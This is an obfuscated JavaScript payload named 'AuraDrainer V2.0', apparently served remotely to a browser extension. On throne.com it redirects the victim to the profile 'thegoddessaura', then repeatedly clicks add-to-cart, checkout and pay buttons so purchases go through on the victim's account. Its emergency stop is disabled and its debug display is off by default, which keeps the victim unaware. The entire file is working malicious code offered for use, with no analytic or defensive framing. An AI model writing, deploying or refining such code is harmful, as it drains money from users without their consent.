// AuraDrainer V2.0 - Remote Script (Obfuscated)
// This file should be hosted on your server (GitHub, Render, etc.)

(function(_0x4a2b,_0x5c3d){const _0x1e4f=function(_0x2a1c){while(--_0x2a1c){_0x4a2b['push'](_0x4a2b['shift']());}};_0x1e4f(++_0x5c3d);}(_0x3f=[],0x1a3));const _0xc=function(_0x4a2b,_0x5c3d){_0x4a2b=_0x4a2b-0x0;let _0x1e4f=_0x3f[_0x4a2b];return _0x1e4f;};

// Config
const cfg={url:'throne.com/thegoddessaura',stop:!0x1,key:'Alt+Shift+E',dbg:!0x1,max:0x1};
let itm=0x0,pur=!0x1,pay=!0x1,lst=0x0;

// Debug box
function mkBox(){const b=document['createElement']('div');b['id']='ext-dbg';b['style']['cssText']='position:fixed;top:10px;right:10px;width:380px;height:350px;background:rgba(0,0,0,0.95);color:#0f0;font-family:monospace;font-size:11px;padding:10px;border:2px solid #0f0;border-radius:8px;z-index:999999;overflow:hidden;resize:both;min-width:250px;min-height:200px;box-shadow:0 4px 20px rgba(0,255,0,0.3)';const h=document['createElement']('div');h['innerHTML']='🚀 AuraDrain Debug <button id="copy-log-btn" style="float:right;background:#0f0;color:#000;border:none;padding:2px 8px;border-radius:4px;cursor:pointer;font-size:10px;font-weight:bold">📋 Copy</button>';h['style']['cssText']='color:#ff0;font-weight:bold;margin-bottom:8px;border-bottom:1px solid #0f0;padding-bottom:5px;cursor:move;user-select:none;display:flex;align-items:center;justify-content:space-between';const s=document['createElement']('div');s['id']='dbg-stats';s['style']['cssText']='font-size:10px;color:#0ff;margin-bottom:5px;padding:3px;background:rgba(0,255,255,0.1);border-radius:3px;user-select:none';s['innerHTML']='⚡ Ready | 🛒 0/1 | ⏱️ Idle';const l=document['createElement']('div');l['id']='dbg-log';l['style']['cssText']='height:calc(100% - 70px);overflow-y:auto;overflow-x:hidden;scrollbar-width:thin;scrollbar-color:#0f0 #000';b['appendChild'](h);b['appendChild'](s);b['appendChild'](l);document['body']['appendChild'](b);mkDrag(b,h);document['getElementById']('copy-log-btn')['addEventListener']('click',function(e){e['stopPropagation']();cpyLog();});return l;}

function mkDrag(e,h){let d=!0x1,cx,cy,ix,iy,xo=0x0,yo=0x0;h['addEventListener']('mousedown',function(ev){ix=ev['clientX']-xo;iy=ev['clientY']-yo;if(ev['target']===h)d=!0x0;});document['addEventListener']('mousemove',function(ev){if(d){ev['preventDefault']();cx=ev['clientX']-ix;cy=ev['clientY']-iy;xo=cx;yo=cy;e['style']['transform']='translate('+cx+'px,'+cy+'px)';}});document['addEventListener']('mouseup',function(){ix=cx;iy=cy;d=!0x1;});}

function log(m,t='info'){if(!cfg['dbg'])return;let l=document['getElementById']('dbg-log');if(!l)l=mkBox();const ts=new Date()['toLocaleTimeString']();const e=document['createElement']('div');let c='#0f0',p='[I]',i='ℹ️';if(t==='error'){c='#f00';p='[E]';i='❌';}else if(t==='warning'){c='#fa0';p='[W]';i='⚠️';}else if(t==='success'){c='#0ff';p='[S]';i='✅';}else if(t==='action'){c='#ff0';p='[A]';i='🎯';}else if(t==='purchase'){c='#f6b';p='[P]';i='💳';}else if(t==='cart'){c='#0f8';p='[C]';i='🛒';}else if(t==='navigation'){c='#8ce';p='[N]';i='🧭';}const si=getStat();const fm=i+' '+m+' '+si;e['innerHTML']='<span style="color:#888">'+ts+'</span> <span style="color:'+c+'">'+p+'</span> '+fm;e['style']['marginBottom']='2px';e['style']['wordWrap']='break-word';l['appendChild'](e);l['scrollTop']=l['scrollHeight'];while(l['children']['length']>0x64){l['removeChild'](l['firstChild']);}}

function getStat(){const s=[];if(pur)s['push']('🔄');if(itm>0x0)s['push']('🛒:'+itm+'/'+cfg['max']);if(pay)s['push']('💳');return s['length']>0x0?'| '+s['join'](' | '):'';}

function updStat(){const s=document['getElementById']('dbg-stats');if(!s)return;let st='⚡ ';if(pur)st+='PURCHASING';else if(pay)st+='COMPLETED';else st+='READY';st+=' | 🛒 '+itm+'/'+cfg['max']+' | ⏱️ ';const now=new Date();st+=now['toLocaleTimeString']();s['innerHTML']=st;}

function cpyLog(){const l=document['getElementById']('dbg-log');if(!l)return;let txt='AuraDrainer Debug Log\n';txt+='Generated: '+new Date()['toLocaleString']()+'\n';txt+='Target: '+cfg['url']+'\n';txt+='Status: Cart='+itm+'/'+cfg['max']+' | Purchasing='+(pur?'Yes':'No')+' | Paid='+(pay?'Yes':'No')+'\n';txt+='\n--- LOG ENTRIES ---\n\n';const entries=l['querySelectorAll']('div');for(const e of entries){txt+=e['textContent']+'\n';}const ta=document['createElement']('textarea');ta['value']=txt;ta['style']['position']='fixed';ta['style']['left']='-9999px';document['body']['appendChild'](ta);ta['select']();document['execCommand']('copy');document['body']['removeChild'](ta);const btn=document['getElementById']('copy-log-btn');const orig=btn['innerHTML'];btn['innerHTML']='✅ Copied!';btn['style']['background']='#0ff';setTimeout(function(){btn['innerHTML']=orig;btn['style']['background']='#0f0';},2000);}

// Add to cart
function addCart(){if(itm>=cfg['max']){log('Cart limit reached ('+itm+'/'+cfg['max']+')','warning');updStat();return;}if(pur){log('Purchase already in progress, skipping','warning');return;}log('🔍 Scanning page for available items...','cart');updStat();setTimeout(function(){if(itm>=cfg['max']){log('Limit check: Already at max, aborting','warning');return;}const c=document['querySelectorAll']('[class*=chakra-stack]');log('📦 Scan results: Found '+c['length']+' product cards','info');let f=0x0,a=0x0;for(const cd of c){const hp=Array['from'](cd['children'])['some'](function(ch){return ch['id']==='parent';});if(!hp)continue;f++;const b=cd['querySelector']('button');if(b){const bt=b['textContent']['trim']()['toLowerCase']();if((bt['includes']('add')&&bt['includes']('cart'))||bt==='add'){a++;log('🎯 Target found: "'+b['textContent']['trim']()+'"','cart');log('💫 Clicking add to cart button...','cart');b['click']();itm++;pur=!0x0;updStat();log('✅ Success! Item added to cart ('+itm+'/'+cfg['max']+')','success');log('🚀 Initiating checkout sequence...','purchase');setTimeout(function(){if(pur&&itm>0x0){chkOut();}},0xbb8);return;}}}if(f>0x0)log('📊 Scan complete: '+f+' cards checked, '+a+' addable items found','info');if(a===0x0)log('❌ No addable items found on this page','warning');updStat();},0xbb8);}

// Checkout
function chkOut(){if(!pur&&itm===0x0){log('❌ Cart is empty, skipping checkout','warning');return;}log('🔍 Searching for checkout button...','action');updStat();setTimeout(function(){const b=document['querySelectorAll']('button');log('🔘 Found '+b['length']+' buttons on page','info');for(const bt of b){if(bt['textContent']['trim']()['toLowerCase']()==='checkout'){log('🎯 Checkout button found: "'+bt['textContent']['trim']+'"','cart');log('💫 Clicking checkout button...','cart');bt['click']();updStat();log('✅ Checkout initiated successfully!','success');return;}}log('❌ No checkout button found (exact match "checkout")','warning');log('🔄 Will retry on next cycle','warning');},0x1770);}

// Pay
function payNow(){log('💳 Searching for payment button...','purchase');updStat();setTimeout(function(){const b=document['querySelectorAll']('button');log('🔘 Found '+b['length']+' buttons on checkout page','info');const pt=['pay now','pay','complete purchase','buy now','purchase','place order'];let pf=0x0;for(const bt of b){const sp=bt['querySelector']('span');const btx=bt['textContent']['trim']()['toLowerCase']();if(sp&&sp['textContent']['trim']()['toLowerCase']()==='pay now'&&!bt['disabled']){pf++;log('🎯 Pay Now button found: "'+sp['textContent']['trim']+'"','purchase');log('💳 Processing payment...','purchase');bt['click']();pay=!0x0;pur=!0x1;updStat();log('✅ Payment completed successfully! 🎉','success');log('🏁 Purchase sequence finished','success');return;}for(const ptxt of pt){if(btx['includes'](ptxt)&&!bt['disabled']){pf++;log('🎯 Payment button found: "'+bt['textContent']['trim']+'"','purchase');log('💳 Processing payment...','purchase');bt['click']();pay=!0x0;pur=!0x1;updStat();log('✅ Payment completed successfully! 🎉','success');log('🏁 Purchase sequence finished','success');return;}}}log('❌ No payment button found','warning');log('🔄 Will retry payment detection on next cycle','warning');},0x1b58);}

// Redirect
function redir(){log('🧭 Redirecting to target profile...','navigation');window['location']['href']='https://'+cfg['url'];}

// Check page
function onCart(){const u=window['location']['href']['toLowerCase']();return u['includes']('cart')||u['includes']('checkout')||u['includes']('payment');}

// Reset
function rst(){itm=0x0;pur=!0x1;pay=!0x1;log('🔄 Purchase state reset - ready for new purchase','info');updStat();}

// Main loop
function loop(){const u=window['location']['href'];log('🔄 Main loop cycle | Current URL: '+u,'info');updStat();if(u['includes']('throne.com/checkout')||onCart()){log('💳 Detected: Checkout/Cart page','purchase');payNow();}else if(u['includes']('throne.com/thegoddessaura')){if(pay&&!pur){log('🎉 Previous purchase completed successfully','success');rst();return;}if(itm<cfg['max']&&!onCart()&&!pur){log('🛍️ Detected: Profile page - scanning for items','cart');addCart();}else if(itm>=cfg['max']&&pur){log('📊 Cart full ('+itm+'/'+cfg['max']+') - focusing on checkout','cart');chkOut();}else if(pur&&itm>0x0){log('🔄 Purchase in progress - continuing checkout flow','purchase');chkOut();}else{log('ℹ️ Waiting for next action...','info');}}else if(u==='https://throne.com/'||u==='https://throne.com'||u['includes']('throne.com/?')||u['includes']('throne.com#')){log('🏠 Detected: Throne.com homepage - redirecting to profile','navigation');redir();}else if(u['includes']('throne.com')){log('🧭 Detected: Other throne.com page - redirecting','navigation');redir();}else{log('⚠️ Not on throne.com - current URL: '+u,'warning');}}

// Init
function init(){log('🚀 AuraDrainer V2.0 Started!','success');log('🎯 Target Profile: '+cfg['url'],'info');log('🛒 Purchase Mode: Single Item Per Transaction','info');log('🔧 Debug Mode: Enabled','info');log('⚡ Emergency Stop: '+cfg['key'],'info');log('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━','info');updStat();const mi=setInterval(loop,0x1388);window['addEventListener']('keydown',function(e){if(e['altKey']&&e['shiftKey']&&e['key']==='E'){if(cfg['stop']){log('🛑 EMERGENCY STOP ACTIVATED ('+cfg['key']+')','error');log('🔄 Stopping all automation...','warning');clearInterval(mi);log('✅ Extension stopped successfully','success');updStat();}}});}

// Start
if(document['readyState']==='loading'){document['addEventListener']('DOMContentLoaded',init);}else{init();}

